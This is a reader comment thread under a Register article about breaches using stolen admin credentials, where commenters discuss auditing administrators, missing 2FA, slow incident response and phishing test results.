back to article 3l33t haxxors don't need no botnet, they just pinch passwords

Half of all breaches Dell's SecureWorks outfit has responded to over the last year have been a result of attackers using legitimate admin tools and stolen credentials. Dell's threat research unit says the "living off the land" hack tactic makes security controls that seek malware and hacking infrastructure redundant, …

  1. Anonymous Coward
    Anonymous Coward

    User Monitoring

    It strikes me that, if stolen admin credentials are a significant cause of breach, the approach to monitoring user activity should focus as much on what the administrators are doing as on what the ordinary users are doing. Maybe more so.

    1. Patrick R

      Re: User Monitoring

      But who will monitor the administrator's activity? ...

      1. Vic

        Re: User Monitoring

        But who will monitor the administrator's activity?

        Me, of course.

        Vic.

        1. tony2heads
          Happy

          Re: User Monitoring

          But I will then have to monitor you, Vic

          1. Sir Runcible Spoon

            Re: User Monitoring

            Can someone tell me how these hackers bypassed the 2fa that should be standard for remote admin access into any business network?

        2. This post has been deleted by its author

      2. Peter Gathercole Silver badge

        Re: User Monitoring

        All the organisations subject to Sarbanes Oxley must have full auditing for their privileged accounts, with the audit logs scrutinised by people other than the administrators themselves, preferably in a completely different management stream.

        It's a little tricky to arrange, but it certainly could be done when the main admin interfaces were CLI. It could also be done for X11 sessions, by effectively inserting something like XScope in recording mode in the path.

        Mind you, as someone who took a spell doing it, reading through someone else's admin session was a painful task, that you had to take frequent breaks from if you wanted to maintain your sanity.

        I have no idea how it is done now with remote GUI sessions, although I'm sure that it must be being done.

        1. Wzrd1 Silver badge

          Re: User Monitoring

          "All the organisations subject to Sarbanes Oxley must have full auditing for their privileged accounts, with the audit logs scrutinised by people other than the administrators themselves, preferably in a completely different management stream."

          I work for a Fortune 200 corporation that is global. I'm one of the poor folks who get to monitor our logger, network taps, e-mail system (can retrieve suspect mail to remove phish and malware attachments, as well as spam (can't read the mail though, thankfully. Did that when I was working with US DoD when things were suspicious.).

          One problem, when logs from a global corporation aggregate, it requires massive storage and massive database processing capabilities. That means that on occasion, the logger reporting arrives up to six hours after the suspicious events have occurred.

          Worse, incident response is spottily 24/7/365, resulting in delays in response, resulting in the attack being long over, a webshell used, RDP through the shell, pass the hash attack used, AD trees dumped, etc in minutes.

          Even when everyone's in the office, when the attack is viewed by the web taps and observed as it happens, getting the message to the manager and server admin still takes long enough that the attack is over.

          We've had external "eyes" review the problem, 2 factor not adopted due to the cost to the corporation. Even after a few SOX audits.

          But, we've gotten new tools to help catch the breach, but nothing can speed response in a truly global corporation - *someone* is in bed during an attack and China has plenty of time to breach in.

  2. Alistair
    Windows

    Simple enough

    If admin creds are getting stolen you have issues with your admins not keeping things tidy. If your admins have these issues, I don't wanna know what else is going down the toilet.

    I've had a couple of days where security has called me because I've been WFH, gone out for lunch and had to pop on to sort a quick issue, usually from a hotspot - this pops a bell in the VPN logs. How hard is that? Is this not a starting point? I can imagine that an admin loosing control of a laptop/work desktop is one thing ...... I suspect it would get *me* at least *fired* if I got some sort of viral infection on my work laptop.

    1. Wzrd1 Silver badge

      Re: Simple enough

      "If admin creds are getting stolen you have issues with your admins not keeping things tidy. If your admins have these issues, I don't wanna know what else is going down the toilet."

      We're global, we have thousands of exit nodes we monitor, as well as log aggregators, network taps, HIPS, IPS and more.

      We see webshells created from an unknown entry point, lateral spread via RDP sessions, notepad used as a tool depositing tool, the resultant script ran, which installed more tools, then pass the hash uncovers admin accounts on that box, then those used to enter Active Directory and raise merry hell quietly on the network.

      Incident response teams try to contact that distant manager and admin, to learn that it's between 1 and 3 AM and nobody can respond.

      Or the server is a critical server room pet, which takes days to get off of the network.

      The bugger even got into our antivirus server, software inventory server and more.

      The adversary knows the network well now, knows when response will be slow and capitalized upon that repeatedly.

      2FA would help a lot, but corporate doesn't want to spend the money, as we're talking global 2FA in 100K users.

      I could write a script that could follow the SOB back to the ingress point, terminating his connections and installing itself on the lateral spread points, but the script would have to have a global admin privilege set and that is a greater security risk.

  3. Chunky Lafunga
    FAIL

    Muppets

    Recent pen test at our place and of 800 about 120 replied to phishing emails from a faked Help Desk email asking for their credentials as their had been a security breach.

    Scary was most of these muppets were in sensitive high grade positions such as Legal/Finance/HR/IT.

    They completely gave themselves up and even kept on replying to the sender asking what they should do next. One idiot thought the phishing email was the new Help Desk email and started CC emails about up and coming events in our conference centre which often have members of senior UK and foreign VIPS, Royals and such. Nothing was done about it.

    1. Wzrd1 Silver badge

      Re: Muppets

      "Recent pen test at our place and of 800 about 120 replied to phishing emails from a faked Help Desk email asking for their credentials as their had been a security breach."

      Our organization is a lot larger, a similar test was performed, a bit over 50% reported the phish attempt to security. We're working on improving that number.

      We still have a way to go, as I noted a *.pdf.scr execute and run msiexec successfully just this past weekend.

      It looks like the sales department is in need of remedial training. :/

    2. fajensen
      Boffin

      Re: Muppets

      Scary was most of these muppets were in sensitive high grade positions such as Legal/Finance/HR/IT.

      Contrarily to common beliefs, Stupidity is evenly distributed in any population one could care to check.

      There will be university professors, presidents, politicians, tech-evangelists, CEx's and even Nobel Prize Winners - who are just stupid. Dumb as a sack of broken hammers!

      This creates several problems, the most obvious being:

      1) That the impact of their stupidity scales with their influence and position.

      2) Most people refuse to believe when their senses are telling them that the VIP in front of them is really a retard and should be managed accordingly.

      3) Sociopath's have no trouble at all; A high-level moron is Gold for them and certain ruin for everyone else.

      4) Every stupid VIP will need a "Sir/Dame Humphrey" to mitigate against their retarded-ness (Why The Boss's secretary is generally a force to be reckoned with)!

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like